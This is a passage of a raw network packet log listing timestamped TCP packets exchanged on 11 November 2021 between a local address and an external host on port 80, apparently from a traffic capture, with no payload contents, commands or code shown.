                                                                                                                              Nov 11, 2021 20:35:49.148725033 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.148739100 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.148742914 CET4975180192.168.2.3172.67.196.11
                                                                                                                              Nov 11, 2021 20:35:49.148750067 CET4975180192.168.2.3172.67.196.11
                                                                                                                              Nov 11, 2021 20:35:49.148802042 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.148819923 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.148837090 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.148838043 CET4975180192.168.2.3172.67.196.11
                                                                                                                              Nov 11, 2021 20:35:49.148848057 CET4975180192.168.2.3172.67.196.11
                                                                                                                              Nov 11, 2021 20:35:49.148874044 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.148890972 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.148910999 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.148929119 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.148947001 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.148951054 CET4975180192.168.2.3172.67.196.11
                                                                                                                              Nov 11, 2021 20:35:49.148960114 CET4975180192.168.2.3172.67.196.11
                                                                                                                              Nov 11, 2021 20:35:49.148964882 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.149080992 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.149084091 CET4975180192.168.2.3172.67.196.11
                                                                                                                              Nov 11, 2021 20:35:49.149113894 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.149132013 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.149146080 CET4975180192.168.2.3172.67.196.11
                                                                                                                              Nov 11, 2021 20:35:49.149147034 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.149169922 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.149188042 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.149205923 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.149221897 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.149239063 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.149243116 CET4975180192.168.2.3172.67.196.11
                                                                                                                              Nov 11, 2021 20:35:49.149250984 CET4975180192.168.2.3172.67.196.11
                                                                                                                              Nov 11, 2021 20:35:49.149255037 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.149277925 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.149295092 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.149317980 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.149333954 CET4975180192.168.2.3172.67.196.11
                                                                                                                              Nov 11, 2021 20:35:49.149334908 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.149343967 CET4975180192.168.2.3172.67.196.11
                                                                                                                              Nov 11, 2021 20:35:49.149353027 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.149368048 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.149419069 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.149424076 CET4975180192.168.2.3172.67.196.11
                                                                                                                              Nov 11, 2021 20:35:49.149436951 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.149457932 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.149457932 CET4975180192.168.2.3172.67.196.11
                                                                                                                              Nov 11, 2021 20:35:49.149463892 CET4975180192.168.2.3172.67.196.11
                                                                                                                              Nov 11, 2021 20:35:49.149476051 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.149498940 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.149514914 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.149537086 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.149553061 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.149557114 CET4975180192.168.2.3172.67.196.11
                                                                                                                              Nov 11, 2021 20:35:49.149569035 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.149586916 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.149604082 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.149621010 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.149637938 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.149652958 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.149657965 CET4975180192.168.2.3172.67.196.11
                                                                                                                              Nov 11, 2021 20:35:49.149666071 CET4975180192.168.2.3172.67.196.11
                                                                                                                              Nov 11, 2021 20:35:49.149671078 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.149694920 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.149710894 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.149713993 CET4975180192.168.2.3172.67.196.11
                                                                                                                              Nov 11, 2021 20:35:49.149720907 CET4975180192.168.2.3172.67.196.11
                                                                                                                              Nov 11, 2021 20:35:49.149728060 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.149749994 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.149766922 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.149782896 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.149794102 CET4975180192.168.2.3172.67.196.11
                                                                                                                              Nov 11, 2021 20:35:49.149797916 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.149818897 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.149835110 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.149837971 CET4975180192.168.2.3172.67.196.11
                                                                                                                              Nov 11, 2021 20:35:49.149846077 CET4975180192.168.2.3172.67.196.11
                                                                                                                              Nov 11, 2021 20:35:49.149848938 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.149905920 CET4975180192.168.2.3172.67.196.11
                                                                                                                              Nov 11, 2021 20:35:49.150021076 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.150039911 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.150059938 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.150078058 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.150094986 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.150105000 CET4975180192.168.2.3172.67.196.11
                                                                                                                              Nov 11, 2021 20:35:49.150111914 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.150113106 CET4975180192.168.2.3172.67.196.11
                                                                                                                              Nov 11, 2021 20:35:49.150134087 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.150151968 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.150172949 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.150190115 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.150192976 CET4975180192.168.2.3172.67.196.11
                                                                                                                              Nov 11, 2021 20:35:49.150201082 CET4975180192.168.2.3172.67.196.11
                                                                                                                              Nov 11, 2021 20:35:49.150207996 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.150228024 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.150244951 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.150262117 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.150271893 CET4975180192.168.2.3172.67.196.11
                                                                                                                              Nov 11, 2021 20:35:49.150279045 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.150300026 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.150316954 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.150343895 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.150350094 CET4975180192.168.2.3172.67.196.11
                                                                                                                              Nov 11, 2021 20:35:49.150360107 CET4975180192.168.2.3172.67.196.11
                                                                                                                              Nov 11, 2021 20:35:49.150360107 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.150382996 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.150399923 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.150413990 CET4975180192.168.2.3172.67.196.11
                                                                                                                              Nov 11, 2021 20:35:49.150418043 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.150423050 CET4975180192.168.2.3172.67.196.11
                                                                                                                              Nov 11, 2021 20:35:49.150434971 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.150458097 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.150475979 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.150492907 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.150499105 CET4975180192.168.2.3172.67.196.11
                                                                                                                              Nov 11, 2021 20:35:49.150509119 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.150510073 CET4975180192.168.2.3172.67.196.11
                                                                                                                              Nov 11, 2021 20:35:49.150530100 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.150547028 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.150563955 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.150567055 CET4975180192.168.2.3172.67.196.11
                                                                                                                              Nov 11, 2021 20:35:49.150573969 CET4975180192.168.2.3172.67.196.11
                                                                                                                              Nov 11, 2021 20:35:49.150580883 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.150603056 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.150619984 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.150635958 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.150635958 CET4975180192.168.2.3172.67.196.11
                                                                                                                              Nov 11, 2021 20:35:49.150652885 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.150676012 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.150692940 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.150707960 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.150726080 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.150733948 CET4975180192.168.2.3172.67.196.11
                                                                                                                              Nov 11, 2021 20:35:49.150743008 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.150746107 CET4975180192.168.2.3172.67.196.11
                                                                                                                              Nov 11, 2021 20:35:49.150764942 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.150784016 CET4975180192.168.2.3172.67.196.11
                                                                                                                              Nov 11, 2021 20:35:49.150962114 CET4975180192.168.2.3172.67.196.11
                                                                                                                              Nov 11, 2021 20:35:49.150971889 CET4975180192.168.2.3172.67.196.11
                                                                                                                              Nov 11, 2021 20:35:49.150978088 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.150995016 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.151016951 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.151034117 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.151056051 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.151072979 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.151092052 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.151108027 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.151124001 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.151139975 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.151161909 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.151180029 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.151201963 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.151220083 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.151223898 CET4975180192.168.2.3172.67.196.11
                                                                                                                              Nov 11, 2021 20:35:49.151232958 CET4975180192.168.2.3172.67.196.11
                                                                                                                              Nov 11, 2021 20:35:49.151237965 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.151257038 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.151278973 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.151303053 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.151320934 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.151343107 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.151360035 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.151381969 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.151400089 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.151400089 CET4975180192.168.2.3172.67.196.11
                                                                                                                              Nov 11, 2021 20:35:49.151407957 CET4975180192.168.2.3172.67.196.11
                                                                                                                              Nov 11, 2021 20:35:49.151417971 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.151438951 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.151456118 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.151477098 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.151493073 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.151509047 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.151530027 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.151546955 CET4975180192.168.2.3172.67.196.11
                                                                                                                              Nov 11, 2021 20:35:49.151547909 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.151571989 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.151576996 CET4975180192.168.2.3172.67.196.11
                                                                                                                              Nov 11, 2021 20:35:49.151585102 CET4975180192.168.2.3172.67.196.11
                                                                                                                              Nov 11, 2021 20:35:49.151587963 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.151592970 CET4975180192.168.2.3172.67.196.11
                                                                                                                              Nov 11, 2021 20:35:49.151607037 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.151623964 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.151640892 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.151660919 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.151678085 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.151695013 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.151701927 CET4975180192.168.2.3172.67.196.11
                                                                                                                              Nov 11, 2021 20:35:49.151711941 CET4975180192.168.2.3172.67.196.11
                                                                                                                              Nov 11, 2021 20:35:49.151712894 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.151717901 CET4975180192.168.2.3172.67.196.11
                                                                                                                              Nov 11, 2021 20:35:49.151732922 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.151757002 CET4975180192.168.2.3172.67.196.11
                                                                                                                              Nov 11, 2021 20:35:49.151813030 CET4975180192.168.2.3172.67.196.11
                                                                                                                              Nov 11, 2021 20:35:49.151823044 CET4975180192.168.2.3172.67.196.11
                                                                                                                              Nov 11, 2021 20:35:49.151884079 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.151906013 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.151927948 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.151946068 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.151967049 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.151983976 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.152005911 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.152024984 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.152043104 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.152050972 CET4975180192.168.2.3172.67.196.11
                                                                                                                              Nov 11, 2021 20:35:49.152061939 CET4975180192.168.2.3172.67.196.11
                                                                                                                              Nov 11, 2021 20:35:49.152065039 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.152067900 CET4975180192.168.2.3172.67.196.11
                                                                                                                              Nov 11, 2021 20:35:49.152081966 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.152103901 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.152117968 CET4975180192.168.2.3172.67.196.11
                                                                                                                              Nov 11, 2021 20:35:49.152121067 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.152143002 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.152146101 CET4975180192.168.2.3172.67.196.11
                                                                                                                              Nov 11, 2021 20:35:49.152160883 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.152182102 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.152195930 CET4975180192.168.2.3172.67.196.11
                                                                                                                              Nov 11, 2021 20:35:49.152199984 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.152220964 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.152239084 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.152255058 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.152276993 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.152282953 CET4975180192.168.2.3172.67.196.11
                                                                                                                              Nov 11, 2021 20:35:49.152291059 CET4975180192.168.2.3172.67.196.11
                                                                                                                              Nov 11, 2021 20:35:49.152292967 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.152296066 CET4975180192.168.2.3172.67.196.11
                                                                                                                              Nov 11, 2021 20:35:49.152316093 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.152333975 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.152350903 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.152367115 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.152383089 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.152384043 CET4975180192.168.2.3172.67.196.11
                                                                                                                              Nov 11, 2021 20:35:49.152395010 CET4975180192.168.2.3172.67.196.11
                                                                                                                              Nov 11, 2021 20:35:49.152400970 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.152421951 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.152437925 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.152441978 CET4975180192.168.2.3172.67.196.11
                                                                                                                              Nov 11, 2021 20:35:49.152451038 CET4975180192.168.2.3172.67.196.11
                                                                                                                              Nov 11, 2021 20:35:49.152453899 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.152473927 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.152489901 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.152507067 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.152523994 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.152539968 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.152549028 CET4975180192.168.2.3172.67.196.11
                                                                                                                              Nov 11, 2021 20:35:49.152555943 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.152559042 CET4975180192.168.2.3172.67.196.11
                                                                                                                              Nov 11, 2021 20:35:49.152576923 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.152592897 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.152594090 CET4975180192.168.2.3172.67.196.11
                                                                                                                              Nov 11, 2021 20:35:49.152601004 CET4975180192.168.2.3172.67.196.11
                                                                                                                              Nov 11, 2021 20:35:49.152610064 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.152630091 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.152637959 CET4975180192.168.2.3172.67.196.11
                                                                                                                              Nov 11, 2021 20:35:49.152645111 CET4975180192.168.2.3172.67.196.11
                                                                                                                              Nov 11, 2021 20:35:49.152695894 CET4975180192.168.2.3172.67.196.11
                                                                                                                              Nov 11, 2021 20:35:49.152817965 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.152834892 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.152887106 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.152904987 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.152921915 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.152937889 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.152956963 CET4975180192.168.2.3172.67.196.11
                                                                                                                              Nov 11, 2021 20:35:49.152961016 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.152966022 CET4975180192.168.2.3172.67.196.11
                                                                                                                              Nov 11, 2021 20:35:49.152978897 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.153002024 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.153017998 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.153038979 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.153038979 CET4975180192.168.2.3172.67.196.11
                                                                                                                              Nov 11, 2021 20:35:49.153048038 CET4975180192.168.2.3172.67.196.11
                                                                                                                              Nov 11, 2021 20:35:49.153055906 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.153076887 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.153093100 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.153112888 CET4975180192.168.2.3172.67.196.11
                                                                                                                              Nov 11, 2021 20:35:49.153115034 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.153120995 CET4975180192.168.2.3172.67.196.11
                                                                                                                              Nov 11, 2021 20:35:49.153131962 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.153151035 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.153167009 CET4975180192.168.2.3172.67.196.11
                                                                                                                              Nov 11, 2021 20:35:49.153172970 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.153173923 CET4975180192.168.2.3172.67.196.11
                                                                                                                              Nov 11, 2021 20:35:49.153191090 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.153213024 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.153230906 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.153250933 CET4975180192.168.2.3172.67.196.11
                                                                                                                              Nov 11, 2021 20:35:49.153254986 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.153259993 CET4975180192.168.2.3172.67.196.11
                                                                                                                              Nov 11, 2021 20:35:49.153270960 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.153294086 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.153311014 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.153326988 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.153327942 CET4975180192.168.2.3172.67.196.11
                                                                                                                              Nov 11, 2021 20:35:49.153337002 CET4975180192.168.2.3172.67.196.11
                                                                                                                              Nov 11, 2021 20:35:49.153343916 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.153361082 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.153377056 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.153393030 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.153407097 CET4975180192.168.2.3172.67.196.11
                                                                                                                              Nov 11, 2021 20:35:49.153409004 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.153414965 CET4975180192.168.2.3172.67.196.11
                                                                                                                              Nov 11, 2021 20:35:49.153424978 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.153445959 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.153450966 CET4975180192.168.2.3172.67.196.11
                                                                                                                              Nov 11, 2021 20:35:49.153461933 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.153481960 CET4975180192.168.2.3172.67.196.11
                                                                                                                              Nov 11, 2021 20:35:49.153486013 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.153508902 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.153532028 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.153549910 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.153554916 CET4975180192.168.2.3172.67.196.11
                                                                                                                              Nov 11, 2021 20:35:49.153563976 CET4975180192.168.2.3172.67.196.11
                                                                                                                              Nov 11, 2021 20:35:49.153564930 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.153583050 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.153600931 CET4975180192.168.2.3172.67.196.11
                                                                                                                              Nov 11, 2021 20:35:49.153603077 CET8049751172.67.196.11192.168.2.3
